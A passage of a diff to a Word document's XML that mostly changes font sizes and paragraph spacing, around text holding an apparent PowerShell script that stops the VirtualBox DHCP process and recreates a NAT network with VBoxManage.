           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> = Get-Process -Name </w:t>
@@ -4781,8 +4770,8 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>VBoxDHCP</w:t>
@@ -4790,8 +4779,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> -</w:t>
@@ -4799,8 +4788,8 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>ErrorAction</w:t>
@@ -4808,8 +4797,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
@@ -4817,8 +4806,8 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>SilentlyContinue</w:t>
@@ -4827,16 +4816,17 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>if ($</w:t>
@@ -4844,8 +4834,8 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>dhcpProcess</w:t>
@@ -4853,8 +4843,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>) {</w:t>
@@ -4862,16 +4852,17 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">    Write-Host "Stopping VirtualBox DHCP server..."</w:t>
@@ -4879,24 +4870,25 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>Stop-</w:t>
@@ -4904,8 +4896,8 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>Process</w:t>
@@ -4913,8 +4905,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> -Name </w:t>
@@ -4922,8 +4914,8 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t>VBoxDHCP</w:t>
@@ -4931,8 +4923,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve"> -Force</w:t>
@@ -4940,24 +4932,25 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="nl-BE"/>
         </w:rPr>
         <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">Start-Sleep -Seconds </w:t>
@@ -4965,8 +4958,8 @@
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>2  #</w:t>
@@ -4974,8 +4967,8 @@
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> Wait for the process to terminate</w:t>
@@ -4983,16 +4976,17 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>}</w:t>
@@ -5000,25 +4994,27 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t># Remove existing NAT network if needed</w:t>
@@ -5026,16 +5022,17 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
@@ -5044,16 +5041,17 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
@@ -5062,8 +5060,8 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>natnetwork</w:t>
@@ -5071,8 +5069,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> list | Select-String -Pattern $</w:t>
@@ -5080,8 +5078,8 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>NATNetworkName</w:t>
@@ -5089,8 +5087,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>) {</w:t>
@@ -5098,24 +5096,25 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
@@ -5124,24 +5123,25 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
@@ -5150,8 +5150,8 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>natnetwork</w:t>
@@ -5159,8 +5159,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> remove --</w:t>
@@ -5168,8 +5168,8 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>netname</w:t>
@@ -5177,8 +5177,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> $</w:t>
@@ -5186,8 +5186,8 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>NATNetworkName</w:t>
@@ -5196,24 +5196,25 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
@@ -5222,8 +5223,8 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>NATNetworkName</w:t>
@@ -5231,8 +5232,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>' removed successfully."</w:t>
@@ -5240,16 +5241,17 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
@@ -5258,25 +5260,25 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
         <w:tab/>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
@@ -5285,24 +5287,25 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
@@ -5311,8 +5314,8 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>NATNetworkName</w:t>
@@ -5320,8 +5323,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>' does not exist."</w:t>
@@ -5329,16 +5332,17 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:tab/>
@@ -5347,25 +5351,27 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t># Add NAT network with desired settings</w:t>
@@ -5373,16 +5379,17 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>Write-Output "Creating NAT network '$</w:t>
@@ -5390,8 +5397,8 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>NATNetworkName</w:t>
@@ -5399,8 +5406,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>'."</w:t>
@@ -5408,17 +5415,18 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>VBoxManage</w:t>
@@ -5426,8 +5434,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
@@ -5435,8 +5443,8 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>natnetwork</w:t>
@@ -5444,8 +5452,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> add --</w:t>
@@ -5453,8 +5461,8 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>netname</w:t>
@@ -5462,8 +5470,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> $</w:t>
@@ -5471,8 +5479,8 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>NATNetworkName</w:t>
@@ -5480,8 +5488,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> --network "192.168.0.0/24" --</w:t>
@@ -5489,8 +5497,8 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>dhcp</w:t>
@@ -5498,8 +5506,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> on --ipv6 off --enable</w:t>
@@ -5507,25 +5515,27 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t># Start NAT network</w:t>
@@ -5533,16 +5543,17 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
